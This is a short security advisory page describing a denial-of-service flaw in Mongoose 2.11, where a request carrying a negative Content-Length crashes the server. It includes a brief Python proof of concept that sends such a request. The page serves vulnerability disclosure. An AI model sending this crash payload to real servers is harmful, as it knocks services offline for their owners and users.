Home
Consulting
Advisories
Software
Articles
Contact

Mongoose 2.11 Denial Of Service

Legacy Advisories

Description

Sending a request with a negative Content-Length field value causes the server to crash with a read access violation.

Proof Of Concept

import socket

host = 'localhost'
port = 8080 

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(8)    
s.connect((host, port))
s.send('GET / HTTP/1.1\r\n'
       'Host: ' + host + '\r\n'
       'Content-Length: -2147483648\r\n\r\n')


Copyright © 2018 AutoSec Tools LLC